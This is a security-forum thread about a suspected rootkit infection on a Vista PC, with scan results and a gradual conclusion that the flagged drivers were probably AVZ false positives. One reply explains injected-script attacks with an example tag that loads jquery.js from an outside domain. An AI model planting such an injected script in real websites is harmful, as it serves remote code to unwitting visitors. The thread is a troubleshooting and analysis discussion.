I got Rooted in Vista !!!

Yes in Vista and with IE8 and UAC, just the other day !

It all started so innocently. I Googled for a very well know carpet store hxxp://www.alliedcarpets.com/storelocator.aspx and clicked on the genuine link. ( Rmus kindly checked out the link and reported back that he didn't find/see anything dodgy ) Almost immediately after reaching there, Avira popped up with a Heuristic jscript warning.

As it was Heuristic i thought it might be a FP, and clicked ignore. Yes i know lol. Nothing obvious or out of the ordinary appeared to be happening, and i continued viewing the site for only about a minute. Of course by that time it would be way to late ! Anyway i carried on surfing some regular safe sites, like here, and after about an hour i shut down the PC as i had to go out.

When i came back and rebooted, i noticed the HD wasn't making the usual noises. The log on screen appeared and i logged on, in Admin as usual. As the desktop appeared i saw the taskbar looked faded compared to normal, and some of my Apps hadn't started, including ZoneAlarm. Also Avira had been disabled, and even worse was greyed out. I knew something wasn't right but what ?

As i'm also using a router, i launched a browser and attempted to go online to see if i could. Didn't work, and looking at the routers Led's i saw problems there too. Oh dear !

Went to do a System Restore, but they had ALL gone, now what ? As this PC ( Vista ) isn't mine i felt awful, especially as they would want to use it later on. I rebooted and went into SafeMode, with networking, still no sign of them, and stayed in SM. Launched IE and had no problems this time getting out through the Router to the web.

I have a USB stick with lots of portable security Apps on it. So i plugged it in and updated MBAM, SAS and a2 then scanned in turn, but didn't delete yet as i wanted to see what they all found first. They all detected various things connected with a Bagle nasty and a Trojan. In the heat of the moment i can't have taken any a2 pics, or lost them !

I located the nasties and uploaded the two .SYS to VT. Notice how the file names are different to what i Actually sent ?

uzmwmzg5.sys = uzi4ndaz.sys

utmwmzg5.sys = 11s11ro1s1a2sergio.sys

perce.gif

Deleted all the nasties.

Also ran several other Apps afterwards such as, avz4, Autoruns, HJT, ADS Scanner Version 2.00, mbr v0.3.1 and some ARK's. GMER, Kernel Detective v1.2, RootRepeal v1.2.3.0. I didn't see anything unusual.

In the end there turned out to be too much damage to try and waste time repairing. I reinstalled from the backup drive, and other places, and back now as good as new.

The only other recent change made to this PC, was to install Skype yesterday. Only added 2 video contacts to test, which went very smoothly and worked fine first time. Having said that, even though i set it reject all but in the contacts, 2 unknown messages got through. How did they get in ? They were both from sex chat/contact sites lol. I copied the obsufcated links and pasted into IE to see, very enlightening. Still got them if you wanna have a look, for research purposes of course !

Was it the furniture www Script, something received via Skpye or ? I don't know. But as the problems visibly appeared after the Avira warning and my reboot, i'm presuming it might have been the furniture www that has/had been compromised somehow. If so then my fault for ignoring the prompt from Avira.

The strange thing though, is that in the VirusTotal scan Avira is a No show for this Bagle ? So i'm still not sure exactly where it came from.

What an adventure !


Sreenies to follow

 

1st Screenies

 

2nd lot

~VirusTotal screenshots removed~

 

you sound surprised?

 

Re the VT screenies that have been removed !

utmwmzg5.sys = 11s11ro1s1a2sergio.sys was only detected by 18 out of 41

uzmwmzg5.sys = uzi4ndaz.sys was a no detect by any.

I should have originally added, VT stated both files had been scanned before and i clicked to show those results.

@ kC, without the Sunshine band. Nice tunes !

Yes and no ! Mostly yes.

EDIT

SAS must have been run in Safe Mode, as it's not a PA. Sorry for any confusion there.

 

@StevieO

I can confirm that the link is clean. I went there and nothing out of the ordinary happened (a fully updated Avira was quiet). I think you got that rootkit elsewhere.

 

It's a mystery !!!

But the main thing is, look what they did to " MS's safest OS ever " as touted pre launch by Bill Gates and baldy ? And running the " safest IE ever " with no ActiveX, iframes etc enabled, and UAC.

zopzop

You just nudged me into going there again, and this time i didn't get the Alert i got before.

So either it was a FP originally and Avira fixed it, or there was something but it got removed by the IT peeps ?

If niether then, lord knows where that crap came from. I wasn't emailing, downloading anything etc etc.

 

Can u share the samples( just PM)? Thanks

 

can you me pm me the samples as well?

 

Whoa!!

Correct me if I am wrong, but does this imply that there is some value to Avira's WebGuard?
I have read many post here that WebGuard is just marketing gimmick but this seems to be proof to the contrary?

 

Hi StevieO,

The AV message with the Heuristic jscript warning for jquery.js could have been a false alert. Wepawet reports it as free from the normal stuff:

The AV may have responded to the packed code, which is common in both legitimate and malicious javascript files (search for jquery for a description).

Code:

eval(function(p, a, c, k, e, r) { e = function(c) { return (c < a ? '' : e(parseInt(c / a)))
 + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) }; if (!''.replace(/^/,
 String)) { while (c--) r[e(c)] = k[c]e(c); k = [function(e){ return r[e] } ]; e = function()
  return '\\w+' };c = 1 };while (c--) if (k[c])p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), 

Usually an injected script on the main page will call out to a malicious server for a rigged javascript file. alliedcarpets.com loads jquery.js directly from its server:

Code:

script src="/Scripts/jquery.js"

This would a typical malware injection:

Code:

script src="http://www.3ttgfor.com/jquery.js"

As you say, it's possible that it has been cleaned up, but I checked yesterday when you notified me by PM. You didn't mention the alert for the jquery.js file so I didn't look at it at that time. Unless you had zipped all of the cached files immediately for later analysis, all at this point is speculation.

In this case, how do you know it happened while viewing alliedcarpets.com? Did you check the file creation date/time for the files? That would tell you whether or not the malware installed on your watch!

Regarding rootkit.bagle:

Everything I've seen written about rootkit.bagle shows this malware to be delivered via e-mail messages, file-sharing networks, and downloader sites piggy-backing on something else. It's hard to imagine that this could have sneaked in as a drive-by download - Websense, f-secure, would be all over something like this.

In tests, I've seen UAC effectively block anything from writing to a system directory. I don't see that this exploit goes anywhere on VISTA with UAC unless installation privileges were granted.

Could this have happened when another user was on the computer?

regards,

rich

 

StevieO, Is there any particular reason your running as Admin on your Vista system? If not, try setting your daily use account as User. I setup my sis's Vista rig like that and she hasn't had a problem so far.

 

Wildest

Avira's WebGuard is far from any marketing gimmick. I've lost count on the amount of times it's detected real things on infected www's. Those were no FP's either. www's with verified nasties, and also ones that were later confirmed to be.

Rmus

Yes it could have been a packed code detect. I thought i'd mentioned i got a Heuristic jscript alert from Avira ? I didn't check the file creation date/time. Looks like this " exploit " didn't go anywhere on VISTA with UAC afterall. Thanx for posting the code etc.

innerpeace

I've run as Admin since 98SE days, and just prefer it, no noise. Never had any problems doing so.

----------

Well guess what ?

On further checking utmwmzg5.sys and utmwmzg5.sys look as if if they are connected with AVZ. In which case all those detects by the Apps i scanned with were and are FP's !

So that leaves perce.gif that was detected, which i don't have now, but probably wasn't a nasty. And it was a .GIF as i have show extentions etc enabled.

What does this all mean then ? Well either i was hit with some new unknown zero day nasty from i don't know where, or the PC went wibbly wobbly. Could have been a temp hardware issue i suppose, but i doubt it.

Wish i knew what really happened. But ones things for sure, something/s did and then several Apps detected the same files as nasties. How wierd.

 

Out of curiosity i reversed the packer on the jquery.js script to check the plain source: http://pastebin.com/m7c0b3e24

It mainly just deals with forms, layout data, browser compatibility etc. Something "could" of happened at the particular time you were on the site, but it's more than likely your problems stemmed from elsewhere.

 

1boss1

Thanx for doing that, and the info.

 

utmwmzg5.sys Malware or what ?

Latest results from a few hours ago -

At least 17 vendors are seeing this file as Malware, for eg -

RK Bagle, Trojan unknown, Trojan.Rootkit.Agent

Now either it's a Major FP from all of them, or they are missing a Real serious threat. Whichever way it's not good.

I still have this file if any vendors etc wish to test it.

 

You might want to send it in for analysis, then, to such vendors that detect it only heuristically or as "suspicious" or similar.

One thing is sure, though. Any .sys file that resides in a user profile folder is inherently extremely suspicious. Basically, it is almost certainly one of two things: either it's malware, or it's part of some anti-malware/anti-rootkit/similar thing that probably wasn't programmed all that well and may be a hazard in itself even if it isn't malware.

 

Why u think them malware while they are shown to be part of AVZ?

 

Did anyone contact the maker(s) of AVZ and the various antivirus vendors to report this as a false positive?

 

Windchild

Sending that file to ALL those vendors is i'm afraid unrealistic. If we were allowed to post online scan images on here then hopefully some/all the vendors would find out it's a FP, and fix it sooner or later.

Uploading to VT/Jotti etc is a good way to reach all the vendors listed as the files get forwarded to them afterwards. But obviously they only respond to files they interpret as Malware. As it stands FP's such as this will always have to wait. Pity Jo average who gets alerted with FP's and deletes something/s critical etc !

Yes it's an anti-malware/anti-rootkit .SYS file in AVZ.

aigle

Because of the initial above alert i got from Avira, which led me to scan locally with amongst others, MBAM/SAS. I then uploaded the detected files to VirusTotal & Jotti, and nearly half those vendors then detected Rootkit Bagle etc.

zopzop

I havn't contacted AVZ as yet, but will do. See above about contacting ALL the vendors.

Thanx to everyone for your patience regarding this adventure, which i don't want to repeat any time soon !